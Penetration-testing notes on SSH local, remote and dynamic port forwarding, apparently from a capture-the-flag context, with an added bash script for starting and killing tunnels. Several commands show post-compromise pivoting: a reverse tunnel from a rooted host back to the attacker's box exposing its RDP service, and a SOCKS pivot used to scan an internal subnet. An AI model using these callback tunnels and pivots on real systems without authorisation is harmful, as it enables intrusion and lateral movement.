SSH Tunneling

Local Port Forwarding

ssh -L <local port to listen>:<remote host>:<remote port> <user>@<gateway>

The listener opens on your own machine (127.0.0.1 by default); anything you send to it is carried over the SSH session and delivered by the gateway to <remote host>:<remote port>, so the target only needs to be reachable from the gateway, not from you.

example:

ssh -L 8080:172.17.0.2:8080 aubreanna@10.10.133.4

After this, connecting to 127.0.0.1:8080 on your box reaches 172.17.0.2:8080 as seen from 10.10.133.4 (an address you cannot route to directly).

Remote Port Forwarding

Binds a port on the remote SSH server and sends connections made to it back through the tunnel to a host and port reachable from the SSH client (the reverse of -L)

  • Use case: you root an internal machine that can reach your attacking box, so from that machine you open a reverse SSH tunnel to your attacker with -R and expose the victim's RDP port (3389) on your attacking machine as port 3390; you then point your RDP client at 127.0.0.1:3390. This needs sshd running on the attacking machine with an account the victim can log in as (use a throwaway one). By default the bound port listens on the attacker's loopback only; to bind other interfaces set GatewayPorts yes (or clientspecified) in the attacker's sshd_config.

ssh -R <remote port to bind>:<local host>:<local port> <user>@<attacker_ip>

Run from the compromised host: <remote port to bind> opens on the attacker side, <local host>:<local port> is where the victim delivers the traffic (127.0.0.1:3389 for its own RDP service).

Dynamic Port Forwarding

Dynamic port forwarding makes ssh act as a SOCKS proxy on a local port: every connection sent to that port is tunneled to the SSH server and from there to any destination the server can reach, with the destination chosen per connection by the client tool rather than fixed on the command line

  • use case: we have rooted a DMZ server that has both port 80 and port 2222 (SSH) exposed to the internet. We create a SOCKS proxy on our local attacking box on 8080, which tunnels all incoming traffic to any host in the DMZ network through the compromised web server. ssh -D speaks both SOCKS4 and SOCKS5, so proxychains (socks4 127.0.0.1 8080 in its config) or a browser's proxy settings can use it. Only TCP goes through it: no ICMP pings and no SYN scans, so use nmap -sT -Pn.

ssh -D <local proxy port> -p <remote ssh port> <user>@<target>

Run a tunnel in the background with no shell on the remote side:

ssh -nNT -f -L 8080:localhost:80 user@<remote_ip>

-n: stdin from /dev/null, -N: no remote command, -T: no pty, -f: go to background after authentication. Because there is no shell to exit from, you have to find and kill the process to close the tunnel:

ps aux | grep '[s]sh -nNT'   (note the PID; the [s] stops grep matching itself)
kill <pid>
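The three forwarding modes above, plus a clean way to tear them down, as an added example that is not part of the original notes. All hosts, users, ports and socket paths are assumptions: the -R function is meant to be run on the compromised host, the others on the attacking machine. The `tunnel_pids` helper does the ps-and-kill step as a filter over `ps -eo pid,args` output, so it can be exercised offline.

```shell
#!/usr/bin/env bash
# Added example: SSH tunnel helpers. Every host, user, port and socket
# path below is a placeholder (assumed), not a value from the notes.

# --- Remote (-R): run ON THE COMPROMISED HOST. It dials out to our sshd
# and binds 3390 on the attacker side; connections to attacker:3390 come
# back through the tunnel to the victim's own RDP service (127.0.0.1:3389).
# The bound port sits on the attacker's loopback only unless the attacker's
# sshd_config has "GatewayPorts yes" (or clientspecified).
# -f background, -N no remote command, -T no pty,
# -M/-S create a control socket so the tunnel can be closed cleanly later.
expose_rdp_on_attacker() {
    ssh -fNT -M -S /tmp/rdp.sock -R 3390:127.0.0.1:3389 attacker@10.10.14.5
    # then, on the attacking box: xfreerdp /v:127.0.0.1:3390 /u:<user>
}

# --- Dynamic (-D): run on the attacking machine. ssh listens as a SOCKS
# proxy on 127.0.0.1:8080 and egresses from the DMZ host (sshd on 2222).
# Point tools at it, e.g. "socks4 127.0.0.1 8080" in /etc/proxychains4.conf,
# then: proxychains4 nmap -sT -Pn -p 22,80,445 172.17.0.0/24
# (TCP connect scans only; SYN scans and ICMP do not traverse SOCKS.)
start_socks_proxy() {
    ssh -fNT -M -S /tmp/socks.sock -D 8080 -p 2222 user@203.0.113.10
}

# --- Local (-L): same shape as the page's example, with a control socket.
forward_local_8080() {
    ssh -fNT -M -S /tmp/local.sock -L 8080:172.17.0.2:8080 aubreanna@10.10.133.4
}

# Clean teardown via the control socket instead of hunting for PIDs.
# usage: close_tunnel /tmp/socks.sock user@203.0.113.10
close_tunnel() {
    ssh -S "$1" -O exit "$2"
}

# Fallback for tunnels started without -M: print PIDs of ssh clients that
# carry a -L/-R/-D forward. Reads "ps -eo pid,args" output from stdin (or
# from a file given as an argument) so it can be tested offline. sshd and
# the grep process are skipped because only a command word of "ssh"
# (optionally with a path) is accepted; -oLogLevel style options and
# -p/-S/-M/-fNT flag groups do not match the forward-flag pattern.
tunnel_pids() {
    awk '$2 ~ /(^|\/)ssh$/ {
            for (i = 3; i <= NF; i++)
                if ($i ~ /^-[A-Za-z]*[LRD]([0-9:*.]|\[|$)/) { print $1; next }
         }' "$@"
}

# Kill every forwarding ssh client visible to this user.
# usage: kill_tunnels
kill_tunnels() {
    for p in $(ps -eo pid,args | tunnel_pids); do
        kill "$p"
    done
}
```

Prefer the control-socket functions: `ssh -O exit` closes exactly the session you started, while `kill_tunnels` takes down every forwarding ssh client it can see, including ones you may want to keep.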
